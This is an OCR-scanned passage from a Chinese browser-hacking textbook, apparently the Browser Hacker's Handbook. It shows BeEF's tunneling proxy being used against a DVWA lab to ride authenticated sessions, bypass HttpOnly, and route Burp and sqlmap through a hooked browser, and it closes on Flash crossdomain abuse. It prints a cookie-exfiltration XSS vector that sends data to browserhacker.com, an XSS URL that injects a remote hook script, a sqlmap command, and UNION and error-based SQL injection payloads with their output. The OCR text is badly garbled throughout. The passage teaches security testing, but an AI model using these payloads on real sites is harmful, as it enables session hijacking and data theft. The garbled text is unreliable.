完全 支持 的 情况 下 ， 才 会 启用 WebSocket， 因 此 也 不 必 担 心 会 失去 勾 连 那些 老 版 本 的 浏览 絮 的 可 


能 性 。 
9.8.1 通过 浏览 器 上 网 
对 被 勾 连 的 浏览 器 而 言 ， 最 常见 的 代理 配置 之 一 是 通过 它 使 用 标准 的 HTTP 代 理 作为 上 网 中 
介 。 下 面 稍微 解释 一 下 这 种 模型 。 
你 不 必 使 用 标准 的 HTTP 代 理 , 而 是 将 其 插入 被 勾 连 的 浏览 器 。 这样 勾 连 浏览 器 就 成 了 中 介 ， 
不 仅 可 以 代理 你 的 请 求 , 而 且 可 以 发 送 该 代理 权限 范围 内 的 所 有 请 求 。 结果 就 是 通过 该 勾 连 浏览 






























































器 可 以 浏览 匀 连 源 ， 而 该 源 很 可 能 是 你 之 前 看 不 到 的 。 9 
关键 在 于 ,每 个 请 求 都 是 以 勾 连 浏览 器 的 权限 发 送 的 。 正 如 本 音 前 面 强 调 的 ， 如果 攻击 目标 











经 过 了 某 个 应 用 的 认证 ， 那 么 这 个 浏览 器 也 就 是 经 过 认证 的 。 图 9-17 展 示 了 配置 为 使 用 
127.0.0.1:6789 ( BeEF 的 Tunneling Proxy URI) 的 Opera 浏 览 器 被 作为 默认 HTTP 代 理 。 

在 这 个 Opera 浏 览 嚣 中， 攻击 者 请 求 /dvwa/vulnerabilities/upload 源 ， 它 属于 勾 连 域 的 一 部 分 。 
如 图 9-18 中 的 日 志 所 示 , 请 求 到 达 了 代理 ,之 后 又 被 转换 成 一 个 XMLHttpRequest 并 被 注入 勾 连 


Dp 
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e > © o |O web [1724637147 /óvna vulnerabilities [sq] E ith Coogle 


din ; Vulnerability: SQL Injection 


Preferences 


| General Forms Search Webpages BED 


8.0.0. Proxy servers. 











E 5 
More info h © Use manual proxy configuration 
Proxy server Port 


& HTTP. 12700.1 | 6789 


Use this proxy for all protocols. 











Use proxy for local servers 
Exception List 
Toolbars Use automatic proxy configuration. 


Shortcuts. 
Local path or web address to a proxy auto-config (PAC) file 





Help Cancel | [0k 








图 9-17 Opera 使 用 BeEF 的 Tunneling Proxy 


[13:16:50] Using Hooked Browser with ip [172.16.37.1] as Tunneling Proxy 
[13:16:55][»] [PROXY] --> Forwarding request $13: domain[172.16.37.147:80], method[GET], path[/dvwa/vulnerabilities/fi/], cross domain[true] 
processed 


[13:16: :57][»] [PROXY] «-- Response for request #13 to [/dvwa/vulnerabilities/fi/] on domain [172.16.37.147:80] correctly 


[13:17:00][»] [PROXY] --» Forwarding request $14: domain[172.16.37.147:80], method[GET], path 
[13:17:02][»] [PROXY] «-- Response for request #14 to [/dvwa/vulnerabilities/upload/] on domain [172.16.37.147:80] OE processed 





图 9-18 Tunneling Proxy 调 试 日 志 

在 图 9-19 中 ,可 以 看 到 xMLHttpRequest 对 象 的 原始 请 求 和 响应 首部 被 注入 勾 连 的 Firefox 浏 
览 器 ,该 浏览 器 请 求 并 正确 取得 了 /dvwa/vulnerabilities/upload 源 。 注 意 ，User-Agent 和 源 IP 还 是 勾 
连 浏览 器 的 








172.16.37.147 1.3KB 172.16.37.147:80 | 3ms 
Headers Response Cache HTML Cookies 


Response Headers 
Cache-Control no-cache, must-revalidate 
Connection Keep-Alive 
Content-Encoding gzip 
Content-Length 1358 
Content-Type text/html;charset-utf-8 
Date Sun, 28 Apr 2013 12:16:59 GMT 
Expires Tue, 23 Jun 2009 12:00:00 GMT 
Keep-Alive timeout-15, max=99 
Pragma no-cache 
Server Apache/2.2.14 (Ubuntu) 
Accept-Encoding 


Vai 
X-Powered-By PüP/5.3.2-1ubuntu4.17 


Request Headers 
Accept text/html, application/xntml+xml, application/xml;q=0.9,*/#;q=0.8 

Accept-Encoding gzip, deflate 

Accept-Language en-US,en;q=0.5 


Connection keep-alive 
Cookie securityelow; PHPSESSID«hs9e9dg79k0ue1mpSojs31ko55; BEEFHOOK«uK8PNiPMzrtHKI3xudyiMlpHkpsjeNWncDQU7QD 


qV1AtHEZRWiYrZRdc9LvSSeSz2iEnTULIRh33TYgky 
DNT 1 
Host 172.16.37.147 
Referer http://172.16.37.147/dvva/vulnorabilitios/xss r/7namo«V3Cscriptésrc2Di22httpV3A82P3 27172. 16.37. 183A3000 
A2Phook. j582243ER3CV2Fscripti3E 
Mozilla/S.0 (Macintosh; Intel Mac OS X 10.8; rvi20.0) Gecko/20100101 Pirefox/20.0 





User-Agent 





图 9-19 AEN Agy (Firefox ) 代理 请 求 


通过 Tunneling Proxy 的 所 有 请 求 和 响应 ,都 会 存储 在 BeEF 的 数据 库 中 。 这 些 数据 可 以 通过 管 
理 界 面 查询 ， 如 图 9-20 所 示 。 可 以 对 它 们 按照 路 径 、i 青 求 或 响应 时 间 、 域 等 进行 排序 。 方 便 看 到 
曾经 发 送 给 目标 的 所 有 请 求 。 
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217216.37.147 Details | Logs | Commands | Rider | XssRays | Ipec 


OM 9 17216371 History | Forge Request | Proxy | /dvwo/vulnerabilities/upload/ = 
C Otfine Browsers 
Domain Por Method Path .. ResT.. PortStatus Processed 


172.16.37.147 GET isvwalvulnerabiitios/upload/ 


172.16.37.147 idvwaNulnerabiitios/y 


ocsp digicert com IMFEWTzBNMEswSTAJBgUrDgMC 


80 
80 
172.16.37.147 80 ddvwalvulnerabiities/s qi 
80 
80 


cdp1.pubic-trusLcom ICRUOmniroot2025.crl 





图 9-20 ”在 BeEF 的 管理 界面 中 ， 可 以 看 到 代理 的 所 有 请 求 和 响应 





绕 过 HttpOnly 

对 我 们 而 言 ，Web 应 用 的 认证 是 不 假 思索 的 事 。 可 是 我 们 也 知道 ， HTTP 是 一 个 无 状态 协议 ， 
因此 默认 没有 什么 原生 方法 去 处 理 状 态 或 会 话 等 信息 。 为 了 让 HTTP 像 是 有 状态 ， 并 支持 用 户 会 
话 的 概念 ， 这 才 出 现 了 cookie”。 

遗憾 的 是 ， 通 过 cookie 来 区 分 认证 和 非 认 证 Web 应 用 用 户 并 不 十 分 可 靠 。 

(1) XSS 攻 击 盗 取 cookie 

你 可 能 见 过 下 面 这 个 常用 于 窃取 会 话 cookie 的 XSS 向 量 : 

<script>document.location.href="browserhacker.com/ \ 

cookies?c="+document .cookie</script> 


为 了 利用 这 个 会 话 ， 攻 击 者 可 以 用 新 获取 的 值 再 设置 自己 的 cookie。 这 是 一 个 使 用 JavaScript 
抢夺 包含 会 话 token 的 cookie 小 把 戏 。 

为 了 防止 这 种 问题 导致 cookie 失 窃 ，Web 应 用 开发 者 开始 增加 更 多 的 安全 检查 ， 比 如 启用 
HttpOnly 标 签 。 这 个 标签 可 以 阻止 JavaScript 读 取 cookie， 从 而 阻止 攻击 者 获取 会 话 访 问 权 限 。 
假如 觉得 这 样 还 不 够 安全 ，Web 开 发 者 还 可 以 继续 验证 即 Referer、User-Agent 首 部 ,甚至 验证 
源 IP。 

然而 ， 只 要 Web 应 用 存在 XSS 漏 洞 ， 那 所 有 这 些 安全 措施 都 可 以 被 绕 过 。 下 面 我 们 就 看 一 看 
攻击 者 怎么 绕 过 这 些 防御 措施 。 

(2) 使 用 代理 绕 过 HttpOnly 

HttpOnly 标 签 可 以 阻止 运行 在 浏览 器 中 的 脚本 语言 访问 相应 的 cookie。 设 置 这 个 标签 以 后 ， 
cookie 本 身 的 功能 不 受 影响 。 比 如 ， 每 次 向 源 发 送 的 请 求 仍然 会 附 上 这 个 源 最 初 设置 的 cookie。 

虽然 不 能 直接 访问 cookie 中 的 会 话 token， 但 可 以 创建 在 首部 带 上 cookie 一 起 发 送 的 请 求 。 换 
句 话说， 通过 向 浏览 器 发 送 指令 ， 可 以 让 它 向 源 发 送 请 求 。 结 果 ，cookie 就 会 被 包含 在 请 求 里 ， 
之 后 你 就 可 以 发 送 经 过 认证 的 请 求 ， 从 而 获得 对 响应 内 容 的 访问 权 。 

在 整个 过 程 中 ， 你 都 不 需要 访问 cookie， 因 为 可 以 通过 浏览 器 代理 。 根 本 不 需要 读 取 包 含 会 
话 cookie 的 会 话 令 牌 。 

下 面 我 们 使 用 一 个 不 错 的 教学 工具 Damn Vulnerable Web App^5, t&DVWA, 来 作 进一步 说 
明 。DVWA 是 一 个 教学 用 的 可 攻击 Web 应 用 ， 目 的 是 让 人 们 了 解 安全 问题 。DVWA 在 Set-Cookie 
首部 中 没有 使 用 HttpOnly 标 签 ， 不 过 为 了 演示 ,我们 可 以 给 它 加 上 。 为 此 ， 要 修改 dvwa/includes/ 
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dvwaPage.inc.php， 在 第 11 行 后 面 添 加 如 下 代码 : 


Scurrent_cookie = session get cookie params(); 
$sessid - session id(); 
setcookie( 


'PHPSESSID',//name 
$sessid,//value 
0,//expires 
$current cookie['path'],//path 
Scurrent_cookie['domain'],//domain 
false, //secure 
true //httponly 
Jer 


简单 修改 之 后 ， 每 次 创建 PHPSESSID cookie， 就 都 会 带 上 HttpOnly 标 签 了 。 于 是 我 们 就 有 一 
个 安全 了 一 一 点 点 的 DVWA, 下 面 看 看 怎么 绕 过 这 个 防御 措施 。 
为 了 演示 不 需要 读 取 cookie 就 能 利用 目标 的 会 话 ， 可 以 勾 连 DVWA 源 ， 并 通过 该 浏览 絮 代 理 
请 求 。 勾 连 浏 览 器 后 ， 可 以 使 用 BeEF 的 Tunneling Proxy 通 过 勾 连 浏览 器 发 送 隧道 请 求 。 这 样 就 有 


效 地 使 其 相信 你 的 请 求 属于 经 过 认证 的 会 话 。 下 面 的 URL 会 通过 后 认证 的 反射 型 XSS 漏 洞 勾 连 
DVWA 源 : 








http://browservictim.com/dvwa/vulnerabilities/xss_r/?name=\ 
$3Cscript£20src-222http://browserhacker.com/hook.j8s$22$3E$N 
3C$2Fscript£3Ei 


如 图 9-21 所 示 ,， 可 以 看 到 Tunneling Proxy 日 志 中 的 原始 请 求 和 响应 , 3ox HL Ze fiti HO perabil w? 
勾 连 的 域 。 





|GET http://browservictim.com/dvwa/vulnerabilities/exec/ HTTP/1.1 

User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.8.3) Presto/2.12.388 Version/12.15 

Host: browservictim.com 

| Accept: text/html, application/xm};q=0.9, application/xhtml--xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 
| Accept-Language: en,en-US;q=0/9,ja;q=0.8,fr;q=0.7,de;q=0.6,es;q=0.5,it;q=0.4,pt;q=0.3,pt-PT;q=0.2,nl;q=0.1 
| Accept-Encoding: gzip, deflate 
| Proxy-Connection: Keep-Alive 


注意 ， 请 求 不 包含 任何 cookie 首 部 


正确 取得 了 /dvwa/vulnerabilities/exec 页 面 


Response Body 
bref=",,/,,/vulnerabilities/xss_r/,">XSS reflected</a » </li> «Ii onclick= "window. location=",./../vulnerabilities/iss_s/,""Alass=""><a href=".,/../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul> 
«li onclicks"window.location«' ../. /security.php'* dass=""><a href«", /. ./security.php"» DVWA Security</a> </li> vfi onclick» "window location="../../phpinfo.php™ class=""><a 
bref=",./../phpinfo.php">PHP Info«/a» «/li» «li onclick="window.location="../../about.php™ class=""><a href«"//../about.php" »About«/a» </li></ul> «ul» «li 
onclicks"window.location»",./. logout. php'* class»"*» «a href»". /../logout.php"»Logout«/a» </> «Jul» 
</div> 
</div> 
<div id=*main_body"> 
«div dlass="body_padded"> 
<h1>Vulnerability: Command Execution«/h1» 
«div class «"vulnerable code, area" 
«h2» Ping for FREE</h2> 





图 9-21 代理 认证 的 资源 
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在 图 9-22 中 ， 可 以 看 到 勾 连 的 Firefox 浏 览 器 向 URL /dvwa/vulnerabilities/exec 发 送 了 请 求 ， 并 
在 请 求 中 自动 附加 了 正确 的 PHPSESSID cookie 值 。 


Response Headers 


Cache-Control no-cache, must-revalidate 注意 由 于 受害 者 已 被 验证 ， PHPSESSID 


Connection Keep-Alive 
ontent-Length 4331 | 览 
Content-Type text/html;charset=utf-8 cookic 被 浏 Dà 览 器 自 动 添加 了 
Date Tue, 14 May 2013 11:51:51 GMT 





Expires Tue, 23 Jun 2009 12:00:00 GMT 


Keep-Alive timeout=15, max=100 Referer 对 应 易 受 XSS 攻 击 的 URI XSS 


Pragma no-cache 


Server Apache/2.2.14 (Ubuntu) 之 前 用 于 勾 连 受害 者 。XHR 请 求实 际 上 


Vary Accept-Encoding ， yes 
X-Powered-By PHP/5.3.2-lubuntu4.17 是 从 那个 被 匀 连 的 页 面 发 送 的 
Request Headers 

Accept text/html, application /xhtml+xml,application/xml;q=0.9,*/*;q=0 
Accept-Encoding gzip, defla 
Accept-Language en-US,en;q=0.5 

Connection keep-alive 
Cookie security=low; et held ey 91; BEEPHOOK*uhBMFleTN9DPJEDNSB6gIOOq90sAmbiOuGTHsOl 
OfrmzSYqxxIT2cyZEarhfUZa8ksV73wG9 1 

















Host browservic -e La 
Referer ri / [brows com/dvwa/vulaérabilities/xss_r/?name=%3Cscript*20src=%22http: //browserhacker.com 
ook. 直人 
Agent UM 0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0 


[d9-22 ” 义 连 浏览 器 代理 认证 的 资源 


这 说 明 HttpOnly 标 签 不 能 有 效 防 止 使 用 Tunneling Proxy 等 高 级 技术 的 会 话 动 持 ( Session 
Riding ) 攻击 。 有 了 人 勾 连 浏览 器 ， 盗 取 cookie 并 在 攻击 者 浏览 右 中 替换 cookie 值 的 做 法 已 经 被 抛弃 
了 。 即 使 在 Web 应 用 采用 了 双 因 子 认证 或 源 人 及 User-Agent 检 查 等 高 级 验证 的 情况 下 ， 能 够 诱发 
会 话 支持 的 一 个 XSS 就 可 以 把 它们 全 部 搞定 。 

Web 应 用 没 法 区 分 请 求 是 来 自 目 标 浏览 器 的 合法 请 求 , 还 是 来 自 攻击 者 但 通过 目标 浏览 器 发 
送 的 伪造 请 求 。 源 IP 和 User-Agent 此 时 也 是 相同 的 ， 而 双 因 子 认证 也 派 不 上 用 场 ， 因 为 目标 的 会 
话 可 以 被 劫持 。 此 时 ， 正 如 前 面 例子 中 所 演示 的 ，HttpOnly 标 签 也 就 不 中 用 了 。 


















































9.8.2 ”通过 浏览 器 Burp 


如 果 通 过 目标 浏览 器 还 可 以 寻找 SQL 注入 或 远程 命令 执 那 为 什么 要 止步 于 仅仅 是 
浏览 勾 连 域 呢 ?BeEF 的 代理 不 仅仅 能 够 接受 来 自 浏 览 器 的 pa 能 接受 来 自任 意 Web 客 户 端 软 
件 的 通信 。 

发 现 上 述 漏洞 的 一 个 常用 方法 是 使 用 Dafydd Stuttard 的 Burp Suite”。 渗 透 测试 人 员 经 常 使 用 
Burmp 搜 索 安全 漏洞 。Burp 不 仅 可 以 用 于 检测 Web 应 用 ， 还 可 以 用 于 检测 以 HTTP 作 为 主要 协议 的 
任何 应 用 或 系统 。 

好 玩 的 是 , 在 下 面 这 种 情况 下 ， 你 要 在 代理 的 后 面 再 使 用 一 层 代 理 。 换 名 话说 ,我 们 要 通过 
BeEF 的 Tunneling Proxy 代 理 Burp。Burp 支 持 上 行 HTTP (或 SOCKS ) 代理 设置 ， 如 图 9-23 所 示 。 















































Upstream Proxy Servers 


The following rules determine whether Burp sends each outgoing request to a proxy server, or directly to the destin| 
rule that matches each destination host will be used. To send all traffic to a single proxy server, create a rule with 





| Add | | Enabled | Dest host | Proxy host | Proxy port | Auth type | 





w s 127.0.0.1 6789 





Edit 























图 9-23 ”Burp 使 用 BeEF 的 Tunneling Proxy 作 为 上 行 代理 
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下 一 步 是 配置 浏览 器 ， 以 使 用 Burp 作 为 默认 代理 。 仍 然 以 攻击 DVWA 为 例 ， 从 色 连 页 面 
/dvwa/vulnerabilities/xss fr 开始 ， 可 以 在 Burp 的 SiteMap 选 项 卡 中 看 到 更 多 资源 。Burp 会 找到 所 有 
的 a 链接 和 form 动 作 目 标 ， 将 它们 指向 的 资源 添加 到 这 个 SiteMap 树 中 。 在 SiteMap 树 中 有 了 一 些 
资源 之 后 ， 可 以 使 用 Burp 的 Spider 组 件 去 发 现 更 多 资源 ， 如 图 9-24 所 示 。 

















Y http://172.16.37.147 Host | Me 
v [5 dvwa http:;//172.16.37.147 Gi 
D. http://172.16.37.147 GE 
日 about.php http://172.16.37.147 GE 
> E dwa http://172.16.37.147 GE 
8 favicon.ico http://172.16.37.147 GE 
D instructions.php http://172.16.37.147 GE 
D logout.php http://172.16.37.147 GE 
D phpinfo.php http://172.16.37.147 GE 
D security.php http://172.16.37.147 — GE 
D setup.php http://172.16.37.147 GE 
[^ vulnerabilities 
» [3 brute [X http://172.16.37.147/dvwa/vulnerabilities 
> [3 csrf Add to scope 
v & exec de bra 
D Actively scan this branch 

x = fi Passively scan this branch 
> @ sqli Engagement tools pp 
> sqli_blind EE em = 一 一 一 一 = 
» Bl upload Compare site maps 
> B xss.r Expand branch 
> B xss.s Expand requested items 














图 9-24 ”为 Bump 的 Spider 添加 一 个 网 站 资源 分 支 


Spider 很 有 可 能 会 发 现 很 多 新 资源 ， 供 你 从 中 找到 安全 漏洞 。 比 如 ， 如 果 Spider 发 现 了 
/dvwa/vulnerabilities/sqli/ 这 个 资源 , 那 你 会 发 现 它 期 待 一 个 ig 参 数 。 使 用 Burp 的 Repeater 组 件 , 将 
默认 参数 值 修改 为 一 个 不 同 的 整数 值 ， 你 会 看 到 不 一 样 的 输出 结果 。 此 时 ,你 就 会 意识 到 ,这 里 
发 生 了 对 某 种 数据 存储 的 查询 。 

此 时 此 刻 ， 你 想 知 道 这 个 资源 是 否 会 受到 SQL、LDAP 或 XML 注 入 的 影响 。 如 果 你 使 用 的 是 
Burp Suite Professional， 那 可 以 使 用 它 的 Scanner 组 件 ， 如 图 9-25 和 图 9-26 所 示 。 








Request 


| [Raw Params | Headers | Hex 











Send to Spider 
Accept-Language: en Do an active scan 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Window: Send to Intruder Meta--l 
Connection: close Send tok M R 
Referer: http://172.16.37.147/dvwa/vulnerabilities/sq end to Repeater etat 
Send to Sequencer 
Send to Comparer 
Send to Decoder 
Request in browser 





图 9-25 ”对 特定 资源 进行 活跃 度 扫 描 


如 果 你 没有 使 用 Burp Suite Professional， 那 可 以 使 用 免费 的 mtruder 组 件 ， 自 定义 注入 点 和 
payload 内 容 。 虽 然 有 更 自动 化 的 Scanner， 但 很 多 渗透 测试 人 员 仍 然 愿 意 使 用 mtruder， 因 为 可 以 
灵活 地 自 定义 攻击 向 量 和 输出 过 滤 规 则 。 
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Results | Scan queue | Live scanning | Options 











@ http: / /172.16.37.147 | Q SQL injection 
| i Cross-domain Referer leakage 
* i Frameable response (potential Clickjacking) [2] 
i Content type incorrectly stated 








| Advisory Requestl | Responsel | Request2 | Response2 








e SQL injection 





Issue: 


Host: 
Path: 


Severity: 
Confidence: Certain 


SQL injection 
High 


http://172.16.37.147 
/dvwa/vulnerabilities/sqli/ 














如 图 9-26 所 示 ，/dvwa/vulnerabilities/sqli/?3id=xyz 这 个 资 





数据 库 看 起 来 是 MySQL。 


| Issue detail 











The id parameter appears to be vulnerable to SQL injection attacks. 
error message was returned. Two single quotes were then submitted 
of the error message, and the application's handling of other input, 


The database appears to be MySQL. 


图 9-26 ”发 现存 在 漏洞 的 资源 


源 看 起 来 好 像 存在 SQL 注入 漏洞 ， 而 


通过 目标 浏览 器 发 动 攻击 , 不 仅 可 以 在 匀 连 源 中 传输 恶意 请 求 ， 同 样 可 以 增强 隐蔽 性 。 被 攻 
击 的 Web 服 务 器 的 日 志 中 ， 记 录 的 是 勾 连 浏览 器 的 耻 地 址 ， 而 不 是 攻击 者 的 耳 地 址 。 





9.8.3 ”通过 浏览 器 Sqlmap 
































Sqlmap* 是 一 个 比较 流行 的 利用 SQL 注 入 的 开源 工具 ， 也 可 以 通过 Tunneling on o 
如 果 你 绕 不 过 SOP,， 那么 只 能 局 限于 攻击 被 匀 连 的 域 。 如 前 所 述 ， 攻 击 目标 将 从 匀 连 浏览 器 
非 直 接 从 攻击 者 的 源 卫 ， 接 收 到 包含 恶意 SQLi 的 载荷 。 取 决 于 Web 应 用 中 是 否 
保护 措施 ， 这 种 隐蔽 攻击 的 做 法 可 能 是 非常 有 用 的 。 
假设 你 像 前 面 说 的 那样 ,在 使 用 Tunneling Proxy 和 Burp， 然 后 发 现 了 一 个 被 Burp 标 记 为 存在 
SQL 注入 漏洞 的 资源 。 具 体 来 说 ， 就 是 /dtvwa/vulnerabilities/sqli?id=abc。 为 了 通过 Sqlmap 利 用 这 





个 漏洞 ， 可 以 使 用 如 下 命 命令 和 人 参数， 


./sqimap.py --proxy http://127.0.0.1:6789 -u \ 
"http://172.16.37.147/dvwa/vulnerabilities/sqli \ 
/?id=abc&Submit=Submit" -p id -v 3 --current-db 


EF 意 ,这 里 的 选项 --proxy 指 定 了 BeEF 代 理 的 URI。 如 图 9-27 所 示 ， 通 过 Firebug 观 察 勾 连 浏 








览 器 的 原始 请 求 ， 可 以 看 到 URL 编 码 的 恶意 











意 SQLi 攻 击 向 量 。 
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Clear Persist All HTML CSS JS XHR Images Flash Media 





在 BeEF 的 管理 界面 ， 可 以 观察 和 分 析 勾 连 浏览 


些 信息 say AE 


> GET hook js?BEEFHOOK »LvTQSL..hNAoYym& «1367156354932 
* hu 3 vwau vulnerabilities/sali/7id =Abe X27%20UNIONS 


Params Headers Response Cache HTML Cookies 


Response Headers. 
Cache-Control no-cache, must-revalidate 
Connection Keep-Alive 
Content-Encoding gzip 
Content-Length 1414 
Content-Type text/htsl;charseteutf-8 
Date Sun, 28 Apr 2013 13:39:13 OMT 
Expires Tue, 2) Jun 2009 12:00:00 GNT 
Keep-Alive tineout=25, max-67 
Pragma no-cache 
Server Apache/2.2.14 (Ubuntu) 


Vary Accept-Encoding 
X-Powered-By PHP/5.3.2-1ubuntu4.17 

Request Headers. 

GET /dvwa/vulnerabilities/sqli /?id«abcK2 7K20UNTONK2QALLX2GSELECTK2GNULLK2CCONCATX2E 

Host: 172.16.37.147 

User-Agent: Mozillo/S.0 (Macintosh; Intel Moc 0S X 10.8; rv:20. ^ Gecko/20100101 Firefox/20.0 

Accept: text/html ,application/xhtml «xnl application/xml ;q-0.9, */* ;q-0.8. 

Accept-Longuoge: eer redd 

Accept-Encoding: gzip, deflot: 

Referer: http: 7/192. 16.37. 147/dyna/wilnerabiities/xss_r/2nane-KiCscriptsr cKIOK22httpABAKZAK2F172. 16.37. 1X3A3000N2Fhook. jsK2MIKIC serip tc3E 


图 9-27 义 连 浏览 器 发 送 了 Sqlmap 请 求 














是 非常 有 价值 的 。 图 9-28 展 示 了 如 何 观 察 到 包含 取得 当前 数据 库 名 称 的 向 量 的 原 


请 求 ， 以 及 包含 预期 dvwa 值 的 相关 响应 。 





[ History | Forge Request | Proxy | /dwa/vuinerabilities/sqli/ = | /dvwa/vulnerabilities /sqli/ * | 














| Request 
GET http://172.16.37.147:80/dvwa/vulnerabilities/sqli/? 
id=2bc%27%20UNION%20ALL%20SELECT% ZONULL%2CCONCAT% 280x3269647732%2CIFNULL%2BCAST% 2BDATABASE %28%29%20AS% 20CHAR%29%2C0x20% 29 %2C0x326 
364713a%29%238&Submit=Submit HTTP/1.1 
Accept-Language: en-us,en;q=0.5 
Accept-Encoding: gzip,deflate 


Host: 172.16.37.147 O Hy 4H ola zur E 
Accept: text/html, application xhtml xml application/xml;q=0.9,"/*;q=0.8 包含 取 和 当前 数据 库 名 称 的 向 量 的 
User-Agent: 1 ;去 中 

Accept charset 90-8859. a re e 原始 HITP 请 求 

Connection: close 

Pragma: no-cache 

Cache-Control: no-cache,no-store 








| History | Forge Request | Prow | /dvwa/vulnerabilities/sali/ * | /dvwa/vulnerabilties/sqli * | 

















«input type="text" namez"id*» 
«input typez"submit" namez"Submit" valuez"Submit"» 
</form> 


<pre> ID: abc' UNION ALL SELECT NULL,CONCAT(0x326964773a, IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3263647132) #<br>First name: <br>Sumame: 
sidwdWWa:edq:</pre> 


</div> 


«ha» More info</h2> 原始 HTTP 响应 及 取得 的 dvwa 数 据 库 名 称 
<ul> 





图 9-28 ”BeEF 管 理 界面 中 的 Sqlmap 请 求 


器 提交 的 所 有 请 求 和 响应 。 对 攻击 而 言 ， 这 
台 HTTP 


图 9-29 展 示 了 在 BeEF Tunneling Proxy 中 使 用 Sqlmap ， 以 取得 dvwa 当 前 使 用 的 数据 库 名 称 。 
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yin 


= 


a 





14:39:88] [>] [PROXY] --» Forwarding request #142: domain[172.16.37.147:80], method[GET], path[/dwwa/vulnerabilities/sqli/], cross domaini 
14:39:10][»] [PROXY] «-- Response for request #142 to [/dvwa/vulnerabilities/sqli/] on domain [172.16.37.147:80] correctly processed 
14:39:10][»] [PROXY] --» Forwarding request #143: domain[172.16.37.147:80], method[GET], path[/dwwa/vulnerabilities/sqli/], cross domaini 
14:39:12][»] [PROXY] «-- Response for request #143 to [/dvwa/vulnerabilities/sqli/] on domain [172.16.37.147:80] correctly processed 
14:39:12][»] [PROXY] --» Forwarding request #144: domain[172.16.37.147:80], method[GET], poth[/dea Av inerabl ities, cross domain| 
14:39:14][»] [PROXY] <-- Response for request #144 to [/dvwa/vulnerabilities/sqli/] on domain [172.16.37.147:80] correctly processed 
14:39:14][»] [PROXY] --» Forwarding request #145: domain[172.16.37.147:80], method[GET], path[/dvwwa/vulnerabilities/sqli/], cross domain 
14:39:16][»] [PROXY] «-- Response for request #145 to [/dvwa/vulnerabilities/sqli/] on domain [172.16.37.147:80] correctly processed 
14:42:58][»] [INIT] Processing Browser Details... 

4:43:06][»] [PROXY] --» Forwarding request #146: domain[172.16.37.147:80], method[GET], path[/dwwa/vulnerabilities/sqli/], cross domain 
14:43:07][»] [PROXY] «-- Response for request #146 to [/dvwa/vulnerabilities/sqli/] on domain [172.16.37.147:80] correctly 

14:43:07][»] [PROXY] --» Forwarding request #147: domain[172.16.37.147:80], method[GET], path[/dvwa/vulnerabilities/sqli/], cross domain 
14:43:08][»] [PROXY] «-- Response for request #147 to [/dvwa/vulnerabilities/sqli/] on domain [172.16.37.147:80] correctly processed 


Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause 
Payload: id-abc' AND (SELECT 2102 FROM(SELECT COUNT(*),CONCAT(0x306964773a, SELECT (CASE WHEN (2102-2102) THEN 1 ELSE 0 END)),0x3a6 
N.SCHEMA.CHARACTER SETS GROUP BY x)a) AND "UEfS'«'UEfS&Submit«Submit 


Vector: AND (SELECT [RANDNUM] FROMCSELECT COUNT(*) , CONCAT(" [DELIMITER. START] ' , C[QUERY]) , ' [DELIMITER. STOP] ' , FLOORCRAND(0)*2))x FROM II 
x)a) 


Type: UNION query 
Title: MySQL UNION query (NULL) - 2 columns 
Payload: ideabc' UNION ALL SELECT NULL,CONCAT(0x3a6964773a, 0x714b7749577278705246 , @x3063647130)#&Submi t=Submit 
Vector: UNION ALL SELECT NULL, [QUERY] 
[14:43:07] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) 
web application technology: PHP 5.3.2, Apache 2.2.14 
back-end DBMS: MySQL 5.0 
[14:43:07] [INFO] fetching current database 
[14:43:07] [PAYLOAD] abc’ UNION ALL SELECT NULL,CONCAT(0x3a6964773a,IFNULLCCAST(DATABASE() AS CHAR), @x20) ,@x306364713a)# 
[14:43:08] [WARNING] reflective value(s) found and filtering out 


current database: "dvwa* 
[14:43:08] [INFO] fetched data logged to text files under '/Applications/pentest/sqlmap-git/output/172.16.37.147" 


图 9-29 Sqlmap 取 得 了 数据 库 名 称 





9.8.4 通过 Flash 代理 请 


第 4 章 讨论 过 与 宽容 ( 或 大 度 的 ) Flash、Java、Silverlight 和 CORS 跨 域 策略 相关 的 安全 问题 。 
本 节 将 重 温 Flash 数 据 中 错误 配置 SOP 的 问题 ,特别 是 crossdomain.xml 文 件 中 错误 配置 的 问题 。 如 
果 域 browservictim.com 有 一 个 类 似 下 面 这 样 的 /crossdomain.xml 策 略 文 件 , 那 就 是 允许 从 任意 域 加 
载 的 Flash SWF 文 件 或 Java 小 程序 ， 向 browservictim.com 发 送 请 求 并 读 取 响应 : 


<?xml version="1.0" encoding="UTF-8"?> 

<cross-domain-policy> 
<allow-access-from domain="*" /> 

</cross-domain-policy> 


在 crossdomain.xml 错 配 的 基础 上 ， 还 需要 一 些 先决 条 件 ， 才 能 利用 这 个 目标 的 认证 会 话 。 首 
先是 目标 必须 登录 到 m 其 次 是 你 已 经 在 同一 个 浏览 器 中 控制 了 一 个 (不 同 的 ) 
AEW 

述 条 件 都 具备 之 后 , 下 一 步 就 是 把 代理 SWF 文件 能 入 勾 连 源 。 然 后 就 可 以 通过 目标 浏览 器 
代理 发 送 经 过 认证 的 请 求 。 之 所 以 可 以 这 样 做 ， 是 因为 配置 文件 中 的 <allow-access-from 
domain="*" />， 人 允许 从 不 同 源 加 载 的 恶意 SWF 文 件 连 接 到 browservictim.com。 

Erlend Oftedal 写 过 一 个 概念 验证 框架 ， 叫 作 malaRIA”。 它 给 出 了 利用 宽松 的 跨 域 策 略 ， 通 
过 Flash SWF 或 Silverlight 部 件 代 理 请 求 的 过 程 。 

图 9-30 展 示 了 malaRIA 的 工作 原理 。 













































































受害 者 浏览 攻击 者 控制 © 




















browserhacker.com 














ye 
这 个 页 面 中 包含 malaRIA SWF, 
由 受害 者 执行 Wl M 


browservictim.com 





HTTP 响 应 被 发 回 malaRIA 服 务 器 ， 
然后 再 发 给 攻击 者 























| 
，GET /authz/content M \ 
| Host: browservictim.com FAT A OR MAD], SWF. 


可 以 发 送 请 求 并 读 取 响 应 
browservictim.co 
«allow-access-from domain="*" />| 











图 9-30 ”malaRIA 使 用 Flash 代 理 请 求 的 原理 图 


